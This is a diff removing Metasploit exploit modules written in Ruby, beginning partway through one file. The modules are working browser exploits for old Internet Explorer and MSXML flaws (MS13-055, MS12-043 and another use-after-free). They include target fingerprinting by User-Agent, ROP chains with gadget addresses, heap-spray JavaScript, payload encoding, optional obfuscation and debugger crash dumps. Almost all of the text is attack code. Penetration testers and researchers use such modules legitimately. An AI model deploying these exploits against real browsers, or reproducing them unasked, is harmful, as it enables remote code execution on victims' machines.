|
||||
agent = request.headers['User-Agent']
|
||||
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
|
||||
#Windows XP + IE7
|
||||
mytarget = targets[1]
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
|
||||
#Windows Vista + IE7
|
||||
mytarget = targets[2]
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
|
||||
#Windows XP + IE8
|
||||
mytarget = targets[3]
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
|
||||
#Windows 7 + IE8
|
||||
mytarget = targets[4]
|
||||
else
|
||||
mytarget = nil
|
||||
end
|
||||
|
||||
return mytarget
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
#Set default target
|
||||
mytarget = target
|
||||
debug = false
|
||||
|
||||
if target.name == 'Automatic'
|
||||
mytarget = auto_target(cli, request)
|
||||
if mytarget.nil?
|
||||
agent = request.headers['User-Agent']
|
||||
print_error("Unknown User-Agent #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
elsif target.name =~ /Debug/
|
||||
debug = true
|
||||
end
|
||||
|
||||
if debug
|
||||
data = <<-DATA
|
||||
<html>
|
||||
<body>
|
||||
<script language='javascript'>
|
||||
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
|
||||
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
|
||||
document.body.innerHTML += "AAAAAAA";
|
||||
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
DATA
|
||||
|
||||
print_status("Triggering vulnerability (target: #{mytarget.name})...")
|
||||
send_response(cli, data, { 'Content-Type' => 'text/html' })
|
||||
return
|
||||
end
|
||||
|
||||
if mytarget['Rop']
|
||||
p = make_nops(44) #Nops
|
||||
p << "\xeb\x04\xff\xff" #Jmp over the pivot
|
||||
p << [mytarget.ret].pack('V') #Stack pivot
|
||||
p << payload.encoded
|
||||
|
||||
rop_payload = generate_rop_payload('java', p)
|
||||
end
|
||||
|
||||
code = (rop_payload) ? rop_payload : payload.encoded
|
||||
|
||||
# fill the vtable
|
||||
vtable = [mytarget['TargetAddr']].pack('V*')
|
||||
|
||||
#Convert code format so we can unescape() in JavaScript
|
||||
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
|
||||
vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
|
||||
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
|
||||
|
||||
#Extract string based on what the setup is
|
||||
if mytarget.name == 'Internet Explorer 8 on XP SP3'
|
||||
js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
|
||||
elsif mytarget.name == 'Internet Explorer 8 on Windows 7'
|
||||
js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
|
||||
else
|
||||
js_extract_str = "var block = shellcode.substring(0, (0x40000-6)/2);"
|
||||
end
|
||||
|
||||
js = <<-JS
|
||||
function timedRefresh(timeoutPeriod) {
|
||||
setTimeout("location.reload(true);",timeoutPeriod);
|
||||
}
|
||||
|
||||
function enable_lfh(heaplib_obj, obj_size, max) {
|
||||
var vtable = unescape("#{vtable_js}");
|
||||
while (vtable.length < obj_size) vtable += vtable;
|
||||
var obj = vtable.substring(0, (obj_size-6)/2);
|
||||
for (var i=1; i < max; i++) {
|
||||
heaplib_obj.alloc(obj);
|
||||
}
|
||||
}
|
||||
|
||||
function heap_spray(heaplib_obj, offset) {
|
||||
var code = unescape("#{code_js}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x1000) nops += nops;
|
||||
offset = nops.substring(0, #{mytarget['Offset']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
#{js_extract_str}
|
||||
heaplib_obj.gc();
|
||||
for (var i2=0; i2 < 0x400-1; i2++) {
|
||||
heaplib_obj.alloc(block);
|
||||
}
|
||||
}
|
||||
|
||||
heap = new heapLib.ie(0x20000);
|
||||
heap_spray(heap, #{mytarget['Offset']});
|
||||
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
||||
|
||||
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
|
||||
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
||||
|
||||
document.body.innerHTML += "<a id='tag_4' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
|
||||
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
||||
|
||||
document.body.innerHTML += "BBBBBBBBBBBBBBBBBBBBBBB";
|
||||
enable_lfh(heap, #{mytarget['ObjSize']}, 0x500);
|
||||
|
||||
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
|
||||
|
||||
timedRefresh(2000);
|
||||
JS
|
||||
|
||||
js = heaplib(js, {:noobfu => true})
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
|
||||
html = <<-HTML
|
||||
<html>
|
||||
<body>
|
||||
<script language='javascript'>
|
||||
#{js}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
HTML
|
||||
|
||||
print_status("Sending exploit (#{mytarget.name})...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
=begin
|
||||
(b00.1ac): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=0c0c0c0c ebx=0294b920 ecx=0bb300c8 edx=00000000 esi=020be380 edi=00000000
|
||||
eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0 nv up ei pl zr na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
||||
mshtml!CElement::Doc+0x2:
|
||||
6363fcc6 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=????????
|
||||
=end
|
|
@ -1,200 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",
|
||||
'Description' => %q{
|
||||
In IE8 standards mode, it's possible to cause a use-after-free condition by first
|
||||
creating an illogical table tree, where a CPhraseElement comes after CTableRow,
|
||||
with the final node being a sub table element. When the CPhraseElement's outer
|
||||
content is reset by using either outerText or outerHTML through an event handler,
|
||||
this triggers a free of its child element (in this case, a CAnchorElement, but
|
||||
some other objects apply too), but a reference is still kept in function
|
||||
SRunPointer::SpanQualifier. This function will then pass on the invalid reference
|
||||
to the next functions, eventually used in mshtml!CElement::Doc when it's trying to
|
||||
make a call to the object's SecurityContext virtual function at offset +0x70, which
|
||||
results a crash. An attacker can take advantage of this by first creating an
|
||||
CAnchorElement object, let it free, and then replace the freed memory with another
|
||||
fake object. Successfully doing so may allow arbitrary code execution under the
|
||||
context of the user.
|
||||
|
||||
This bug is specific to Internet Explorer 8 only. It was originally discovered by
|
||||
Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again
|
||||
by Orange Tsai at Hitcon 2013.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Jose Antonio Vazquez Gonzalez', # Original discovery reported from iDefense
|
||||
'Orange Tsai', # Rediscovery, published at Hitcon 2013
|
||||
'Peter Vreugdenhil', # Joins the party (wtfuzz)
|
||||
'sinn3r' # Joins the party
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-3163' ],
|
||||
[ 'OSVDB', '94981' ],
|
||||
[ 'MSB', 'MS13-055' ],
|
||||
[ 'URL', 'https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[
|
||||
'IE 8 on Windows XP SP3',
|
||||
{
|
||||
'Rop' => :msvcrt,
|
||||
'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
|
||||
'Align' => 0x77c4d801 # add esp, 0x2c; ret
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 on Windows 7',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'Pivot' => 0x7c348b05, # xchg eax, esp; ret
|
||||
'Align' => 0x7C3445F8 # add esp, 0x2c; ret
|
||||
}
|
||||
]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00"
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Privileged' => false,
|
||||
# Bug was patched in July 2013. Tsai was the first to publish the bug.
|
||||
# But Jose already reported way back in Oct 2012 (to iDefense)
|
||||
'DisclosureDate' => "Jul 09 2013",
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
def get_payload(t)
|
||||
if t['Rop'] == :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
esp_align = "\x81\xc4\x54\xf2\xff\xff"
|
||||
rop_dll = 'msvcrt'
|
||||
opts = {'target'=>'xp'}
|
||||
else
|
||||
print_status("Using JRE ROP")
|
||||
esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
rop_dll = 'java'
|
||||
opts = {}
|
||||
end
|
||||
|
||||
p = esp_align + payload.encoded + rand_text_alpha(12000)
|
||||
generate_rop_payload(rop_dll, p, opts)
|
||||
end
|
||||
|
||||
def get_html(t, p)
|
||||
junk = rand_text_alpha(4).unpack("V")[0].to_i
|
||||
js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*"))
|
||||
js_payload = Rex::Text.to_unescape(p)
|
||||
js_align = Rex::Text.to_unescape([t['Align']].pack("V*"))
|
||||
js_junk = Rex::Text.to_unescape([junk].pack("V*"))
|
||||
|
||||
q_id = Rex::Text.rand_text_alpha(1)
|
||||
|
||||
%Q|
|
||||
<!DOCTYPE html>
|
||||
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
||||
<head>
|
||||
<meta>
|
||||
<?IMPORT namespace="t" implementation="#default#time2">
|
||||
</meta>
|
||||
</head>
|
||||
<script>
|
||||
#{js_mstime_malloc}
|
||||
|
||||
window.onload = function() {
|
||||
var x = document.getElementById("#{q_id}");
|
||||
x.outerText = "";
|
||||
a = document.getElementById('myanim');
|
||||
|
||||
p = '';
|
||||
for (i=0; i < 7; i++) {
|
||||
p += unescape("#{js_junk}");
|
||||
}
|
||||
p += unescape("#{js_payload}");
|
||||
|
||||
fo = unescape("#{js_align}");
|
||||
for (i=0; i < 28; i++) {
|
||||
if (i == 27) { fo += unescape("#{js_pivot}"); }
|
||||
else { fo += unescape("#{js_align}"); }
|
||||
}
|
||||
|
||||
fo += p;
|
||||
|
||||
mstime_malloc({shellcode:fo, heapBlockSize:0x68, objId:"myanim"});
|
||||
}
|
||||
</script>
|
||||
<table>
|
||||
<tr>
|
||||
<div>
|
||||
<span>
|
||||
<q id='#{q_id}'>
|
||||
<a>
|
||||
<td></td>
|
||||
</a>
|
||||
</q>
|
||||
</span>
|
||||
</div>
|
||||
</tr>
|
||||
</table>
|
||||
<t:ANIMATECOLOR id="myanim"/>
|
||||
</html>
|
||||
|
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
t = get_target(agent)
|
||||
|
||||
if t
|
||||
p = get_payload(t)
|
||||
html = get_html(t, p)
|
||||
print_status("Sending exploit...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
|
||||
else
|
||||
print_error("Not a suitable target: #{agent}")
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,427 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "6.0",
|
||||
:ua_maxver => "9.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
|
||||
:method => "definition",
|
||||
:rank => GoodRanking
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption flaw in Microsoft XML Core Services
|
||||
when trying to access an uninitialized Node with the getDefinition API, which
|
||||
may corrupt memory allowing remote code execution.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'inking26', # Reliable exploitation
|
||||
'binjo', # Metasploit module
|
||||
'sinn3r', # Metasploit module
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-1889' ],
|
||||
[ 'BID', '53934' ],
|
||||
[ 'OSVDB', '82873'],
|
||||
[ 'MSB', 'MS12-043'],
|
||||
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
|
||||
[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'Space' => 1024
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# msxml3.dll 8.90.1101.0
|
||||
[ 'Automatic', {} ],
|
||||
[
|
||||
'IE 6 on Windows XP SP3',
|
||||
{
|
||||
'Offset' => '0x100',
|
||||
'Rop' => nil,
|
||||
'RandomHeap' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 7 on Windows XP SP3 / Vista SP2',
|
||||
{
|
||||
'Offset' => '0x100',
|
||||
'Rop' => nil,
|
||||
'RandomHeap' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 on Windows XP SP3',
|
||||
{
|
||||
'Rop' => :msvcrt,
|
||||
'RandomHeap' => false,
|
||||
'RopChainOffset' => '0x5f4',
|
||||
'Offset' => '0x0',
|
||||
'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 with Java 6 on Windows XP SP3',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'RandomHeap' => false,
|
||||
'RopChainOffset' => '0x5f4',
|
||||
'Offset' => '0x0',
|
||||
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'RandomHeap' => false,
|
||||
'RopChainOffset' => '0x5f4',
|
||||
'Offset' => '0x0',
|
||||
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 9 with Java 6 on Windows 7 SP1',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'RandomHeap' => true,
|
||||
'RopChainOffset' => 0x5FC,
|
||||
'Offset' => '0x0',
|
||||
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jun 12 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
|
||||
return targets[1] #IE 6 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows Vista SP2
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
||||
return targets[3] #IE 8 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
|
||||
return targets[5] #IE 8 on Windows 7 SP1/Vista SP2
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
|
||||
return targets[6] #IE 9 on Windows 7 SP1
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def ret(t)
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
|
||||
when :jre
|
||||
return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
|
||||
end
|
||||
end
|
||||
|
||||
def popret(t)
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
|
||||
when :jre
|
||||
return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
|
||||
end
|
||||
end
|
||||
|
||||
def get_rop_chain(t)
|
||||
if t['RandomHeap']
|
||||
adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c
|
||||
adjust << ret(t)
|
||||
else
|
||||
adjust = ret(t)
|
||||
end
|
||||
|
||||
adjust << popret(t)
|
||||
adjust << [ t['StackPivot'] ].pack("V")
|
||||
adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
|
||||
|
||||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
|
||||
|
||||
else
|
||||
print_status("Using JRE ROP")
|
||||
rop = generate_rop_payload('java','',{'pivot'=>adjust})
|
||||
end
|
||||
|
||||
return rop
|
||||
end
|
||||
|
||||
def get_easy_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
|
||||
var offset = nops.substring(0, #{t['Offset']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
|
||||
heap_obj.gc();
|
||||
for (var z=1; z < 0x230; z++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
|
||||
end
|
||||
|
||||
|
||||
def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
randnop2 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
var #{randnop2} = "#{js_90_nops}";
|
||||
var nops_90 = unescape(#{randnop2});
|
||||
var rop_chain = unescape("#{js_rop}");
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
while (nops_90.length < 0x80000) nops_90 += nops_90;
|
||||
|
||||
var offset = nops.substring(0, #{t['Offset']});
|
||||
var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);
|
||||
var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
|
||||
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
|
||||
heap_obj.gc();
|
||||
for (var z=1; z < 0x230; z++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
|
||||
end
|
||||
|
||||
# Spray published by corelanc0d3r
|
||||
# Exploit writing tutorial part 11 : Heap Spraying Demystified
|
||||
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
|
||||
def get_random_spray(t, js_rop, js_code, js_90_nops)
|
||||
|
||||
spray = <<-JS
|
||||
|
||||
function randomblock(blocksize)
|
||||
{
|
||||
var theblock = "";
|
||||
for (var i = 0; i < blocksize; i++)
|
||||
{
|
||||
theblock += Math.floor(Math.random()*90)+10;
|
||||
}
|
||||
return theblock;
|
||||
}
|
||||
|
||||
function tounescape(block)
|
||||
{
|
||||
var blocklen = block.length;
|
||||
var unescapestr = "";
|
||||
for (var i = 0; i < blocklen-1; i=i+4)
|
||||
{
|
||||
unescapestr += "%u" + block.substring(i,i+4);
|
||||
}
|
||||
return unescapestr;
|
||||
}
|
||||
|
||||
var heap_obj = new heapLib.ie(0x10000);
|
||||
|
||||
var rop = unescape("#{js_rop}");
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop2} = "#{js_90_nops}";
|
||||
var nops_90 = unescape(#{randnop2});
|
||||
|
||||
while (nops_90.length < 0x80000) nops_90 += nops_90;
|
||||
|
||||
var offset_length = #{t['RopChainOffset']};
|
||||
|
||||
for (var i=0; i < 0x1000; i++) {
|
||||
var padding = unescape(tounescape(randomblock(0x1000)));
|
||||
while (padding.length < 0x1000) padding+= padding;
|
||||
var junk_offset = padding.substring(0, offset_length - code.length);
|
||||
var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);
|
||||
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
|
||||
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
|
||||
heap_obj.alloc(sprayblock);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
p = payload.encoded
|
||||
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
|
||||
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
|
||||
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
|
||||
|
||||
|
||||
if not my_target['Rop'].nil?
|
||||
js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
|
||||
end
|
||||
|
||||
if my_target['RandomHeap']
|
||||
js = get_random_spray(my_target, js_rop, js_code, js_90_nops)
|
||||
elsif not my_target['Rop'].nil?
|
||||
js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)
|
||||
else
|
||||
js = get_easy_spray(my_target, js_code, js_nops)
|
||||
end
|
||||
|
||||
js = heaplib(js, {:noobfu => true})
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
|
||||
object_id = rand_text_alpha(4)
|
||||
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
#{js}
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
|
||||
<script>
|
||||
var obj = document.getElementById('#{object_id}').object;
|
||||
var src = unescape("%u0c08%u0c0c");
|
||||
while (src.length < 0x1002) src += src;
|
||||
src = "\\\\\\\\xxx" + src;
|
||||
src = src.substr(0, 0x1000 - 10);
|
||||
var pic = document.createElement("img");
|
||||
pic.src = src;
|
||||
pic.nameProp;
|
||||
obj.definition(#{rand(999) + 1});
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
(e34.358): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350
|
||||
eip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
msxml3!_dispatchImpl::InvokeHelper+0xb4:
|
||||
749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????
|
||||
|
||||
|
||||
0:008> r
|
||||
eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528
|
||||
eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
msxml3!_dispatchImpl::InvokeHelper+0xb4:
|
||||
749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????
|
||||
0:008> k
|
||||
ChildEBP RetAddr
|
||||
020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4
|
||||
020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e
|
||||
020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa
|
||||
020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50
|
||||
020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa
|
||||
020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d
|
||||
020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
|
||||
020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
|
||||
020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98
|
||||
020bf590 633a77ff jscript!VAR::InvokeByName+0x135
|
||||
020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
|
||||
020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce
|
||||
020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989
|
||||
020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff
|
||||
020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f
|
||||
020bf958 633891f1 jscript!CSession::Execute+0x175
|
||||
020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0
|
||||
020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a
|
